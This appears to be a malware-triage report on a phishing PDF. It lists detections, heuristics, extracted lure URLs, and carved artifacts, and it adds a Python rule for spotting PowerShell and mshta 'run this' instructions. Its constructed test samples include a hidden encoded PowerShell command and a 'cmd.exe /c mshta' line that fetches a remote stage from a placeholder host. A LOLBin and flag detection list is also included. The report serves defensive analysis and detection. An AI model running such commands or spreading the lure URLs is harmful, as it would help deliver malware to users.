Verdict: MALICIOUS
Risk score: 256

Malware Insights

MITRE ATT&CK
- T1059.007 Command and Scripting Interpreter: JavaScript
- T1566.001 Phishing: Spearphishing Attachment
The PDF_EMBEDDED_SCRIPT_PAYLOAD heuristic flagged script-execution markers (ActiveXObject/CreateObject, WScript.Shell, PowerShell or shell-exec primitives) inside a decompressed PDF stream, and the SE_LOLBIN_RUN_COMMAND heuristic found a Windows execution tool name within 220 characters of a flag, command verb or URL in the extracted text. Together with the link annotation to jacksth.ru and the URLs labelled "macro / runtime command snippet", this is the shape of a lure that directs the reader to fetch and run a second-stage payload from a remote URL. The ClamAV signature (Pdf.Phishing.Trojan) independently classifies the file as a PDF phishing trojan. Two findings should be verified by hand before the "embedded script" conclusion is relied on: the carved "script payload" stream (see Extracted artifacts) begins with a second %PDF-1.4 header and a JPEG image stream rather than readable script text, and one URL in the document text (the smtp_auth_clients_report_powershell.pdf link) contains the token "powershell" inside a file name, which satisfies the LOLBin proximity rule on its own.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics (7)
- ClamAV detection [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
- Embedded script payload in PDF stream [high, PDF_EMBEDDED_SCRIPT_PAYLOAD]: PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes. For this sample the carved stream (Extracted artifacts, offset 0x987B) starts with a PDF header and image data, so locate the marker bytes in the decompressed stream before treating them as a working payload.
- LOLBin token sequence in document text [high, SE_LOLBIN_RUN_COMMAND]: Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible "run this" instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text. Note that the URL http://lafanibawonol.rf.gd/smtp_auth_clients_report_powershell.pdf in the document text places "powershell" next to a URL and would trigger this rule by itself; confirm whether the hit is that file name or an actual command line.
- Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- External URI [info, PDF_URI]: PDF contains an external URL action.
- Object number defined twice with different bodies [info, PDF_DUPLICATE_OBJ_BODY_INCREMENTAL]: The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL channel (macro, JS, link annotation, document body, ...) says how each URL was reached. Extracted URLs, with the channel in parentheses:
  - https://jacksth.ru/wix?keyword=photo+analysis+worksheet (PDF link annotation)
  - http://com-signto6.xyz/verifone_p400_datasheetfmvwa.pdf (PDF document text)
  - https://static.s123-cdn-static.com/uploads/4402711/normal_5fc8ea81b265f.pdf (PDF document text)
  - http://hamlikjorettoop.ru/maplestory_2_assassin_awakening_guidep7b4h.pdf (PDF document text)
  - https://cdn-cms.f-static.net/uploads/4468820/normal_6029d30d0d815.pdf (PDF document text)
  - http://cookwellbakewell.com/cheat_engine_6._3_for_android_apkjsfau.pdf (PDF document text)
  - http://vududodudo.22web.org/tamil_sad_background_music_free.pdf (PDF document text)
  - http://kivudutamazawan.22web.org/42631470372.pdf (macro / runtime command snippet)
  - http://vinnipoh.space/zetagetoragakajukrgp3e.pdf (PDF document text)
  - https://cdn-cms.f-static.net/uploads/4410694/normal_6009c8c104009.pdf (PDF document text)
  - http://www.ascendercorp.com/ (PDF document text)
  - http://www.ascendercorp.com/typedesigners.html (PDF document text)
  - https://s3.amazonaws.com/sesijesule/3_etoiles_guide_michelin_france.pdf (PDF document text)
  - https://s3.amazonaws.com/wofaxil/27453112980.pdf (PDF document text)
  - https://s3.amazonaws.com/kovezodepugov/kiss_the_rain_piano_sheet_music.pdf (PDF document text)
  - https://s3.amazonaws.com/negonanopix/dalupa.pdf (PDF document text)
  - https://s3.amazonaws.com/gedexim/achalpur_amravati_weather_report.pdf (PDF document text)
  - https://s3.amazonaws.com/figidireki/95928766672.pdf (PDF document text)
  - https://s3.amazonaws.com/fadupazageraf/confidentiality_agreement_sample_template.pdf (PDF document text)
  - http://lafanibawonol.rf.gd/smtp_auth_clients_report_powershell.pdf (PDF document text)
  - http://tixixumusugik.rf.gd/35182907560.pdf (macro / runtime command snippet)
  - https://s3.amazonaws.com/jeduzizonox/16691065304.pdf (macro / runtime command snippet)
  - https://s3.amazonaws.com/bisazabe/37203278393.pdf (PDF document text)
  - http://mutifitiwexo.epizy.com/calibration_of_thermometer_lab_report.pdf (PDF document text)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (PDF document text)
  - http://purl.org/dc/elements/1.1/ (PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (PDF document text)
  - http://ns.adobe.com/xap/1.0/ (PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (PDF document text)
  - http://ns.adobe.com/xap/1.0/rights/ (PDF document text)
  - http://scripts.sil.org/OFL (PDF document text)
  The last seven entries (the RDF, Dublin Core and Adobe XMP namespace URIs and the SIL Open Font License URI) are metadata identifiers that a PDF producer and embedded fonts carry by design, not navigable lure links; the ascendercorp.com entries are likely font-foundry references from embedded font metadata as well. The remaining free-hosting and S3 links to other .pdf files are the ones worth pivoting on.
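The SE_LOLBIN_RUN_COMMAND heuristic above is a proximity rule: a tool name within 220 characters of a flag, verb or URL. The following is an added example of how such a rule can be implemented and, more importantly, how to separate a genuine "run this" instruction from a tool name that merely occurs inside a URL path, as the smtp_auth_clients_report_powershell.pdf link in this report does. It is not the analyzer's code; the 220-character window is taken from the heuristic's description, while the token list, flag list and all sample texts are assumptions constructed for the demonstration (the hostnames use the reserved .invalid TLD).

```python
"""Added example: a LOLBin-proximity check in the spirit of SE_LOLBIN_RUN_COMMAND.

Not the analyzer's code. The 220-character window is from the report's own
heuristic description; token/flag lists and sample texts are assumptions."""
import re

WINDOW = 220  # proximity window the report's heuristic describes

# Execution tool names (the report names PowerShell, mshta, cmd, rundll32,
# regsvr32, ...). Explicit look-arounds instead of \b: '_' is a word character,
# so \b would miss 'report_powershell.pdf', which the report's rule does hit.
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9])(?:powershell|pwsh|mshta|cmd|rundll32|regsvr32"
    r"|wscript|cscript|certutil|bitsadmin)(?:\.exe)?(?![A-Za-z0-9])", re.I)

# Dangerous flags, command verbs and URLs. This list is an assumption.
DANGER_RE = re.compile(
    r"-(?:enc|encodedcommand|nop|noprofile|ep\s+bypass|w(?:indowstyle)?\s+hidden)(?![A-Za-z])"
    r"|(?<![A-Za-z0-9])/c(?![A-Za-z0-9])"
    r"|\b(?:iex|invoke-expression|downloadstring|start-process)\b"
    r"|https?://[^\s()<>]+", re.I)
URL_RE = re.compile(r"https?://[^\s()<>]+", re.I)


def lolbin_hits(text, window=WINDOW):
    """Return one dict per tool-name token that has a dangerous flag, verb or
    URL within `window` characters. A hit whose token lies inside a URL is
    marked low confidence: a path such as .../report_powershell.pdf satisfies
    the proximity rule without being an instruction to run anything."""
    url_spans = [m.span() for m in URL_RE.finditer(text)]
    hits = []
    for tok in TOKEN_RE.finditer(text):
        lo = max(0, tok.start() - window)
        hi = min(len(text), tok.end() + window)
        trigger = DANGER_RE.search(text, lo, hi)
        if trigger is None:
            continue
        in_url = any(a <= tok.start() and tok.end() <= b for a, b in url_spans)
        hits.append({"token": tok.group(0), "trigger": trigger.group(0),
                     "confidence": "low" if in_url else "high"})
    return hits


# Constructed sample texts (not taken from the analysed file).
LURE = ("This document is protected. Press Win+R and paste the following to "
        "unlock it: powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA")
RUN_LINE = "cmd.exe /c mshta http://lure.invalid/stage.hta"
# Modelled on the report's smtp_auth_clients_report_powershell.pdf link.
INDEX_PAGE = ("Related downloads: http://example.invalid/smtp_auth_clients_report_powershell.pdf"
              " and http://example.invalid/calibration_of_thermometer_lab_report.pdf")
PROSE = "On a Mac the cmd key is next to the space bar; hold cmd and press C to copy."

if __name__ == "__main__":
    for name, text in [("lure", LURE), ("run line", RUN_LINE),
                       ("index page", INDEX_PAGE), ("prose", PROSE)]:
        print(f"{name}: {lolbin_hits(text)}")
```

The lure body and the cmd.exe /c mshta line come out as high-confidence hits, the prose about a Mac keyboard produces none, and the index page produces a single low-confidence hit whose trigger is the URL that also contains the token. The confidence flag, not the raw hit, is what should feed a verdict.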
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_pdf_script_0000987b.bin | pdf-embedded-script | PDF decompressed stream script payload at offset 0x987B | 70150 bytes | 3f0bd39e098aa4e6a0c4dbaf4e9b12de8be7f5f26fc5a02dd543f93ad39ad8e6 |

Detection (ClamAV): Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
Obfuscation or payload: likely (carved artifact contains 1 shell/COM execution token)
Preview (first 1,000 lines of the extracted artifact). The carve starts with its own %PDF-1.4 header, a document-information dictionary and a DCTDecode (JPEG) image object rather than script text. The strings that begin with the 0xFE 0xFF byte-order mark (shown as þÿ or as replacement characters) are UTF-16BE and decode to "Photo analysis worksheet" (Title), "wkhtmltopdf 0.12.5" (Creator) and "Qt 4.8.7" (Producer); the title matches the keyword in the jacksth.ru link annotation.
%PDF-1.4
1 0 obj
<<
/Title (þÿ P h o t o a n a l y s i s w o r k s h e e t)
/Creator (þÿ w k h t m l t o p d f 0 . 1 2 . 5)
/Producer (þÿ Q t 4 . 8 . 7)
/CreationDate (D:20210217222426+02'00')
>>
endobj
3 0 obj
<<
/Type /ExtGState
/SA true
/SM 0.02
/ca 1.0
/CA 1.0
/AIS false
/SMask /None>>
endobj
4 0 obj
[/Pattern /DeviceRGB]
endobj
6 0 obj
<<
/Type /XObject
/Subtype /Image
/Width 625
/Height 155
/BitsPerComponent 8
/ColorSpace /DeviceRGB
/Length 7 0 R
/Filter /DCTDecode
>>
stream
(binary DCTDecode image stream bytes omitted)
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| font_00_sfnt_off0000d0e6.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0xD0E6 | 5032 bytes | 4883ef4fa1a3b9f4c45f65c07614391d6a04d0a3748d17860e24f7f8322aa47f |
| font_01_sfnt_off0000e213.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0xE213 | 10296 bytes | c6bb558a9cc3b364430074859fa80da065cbcb60350c0b8a9bc14e06c39c8fde |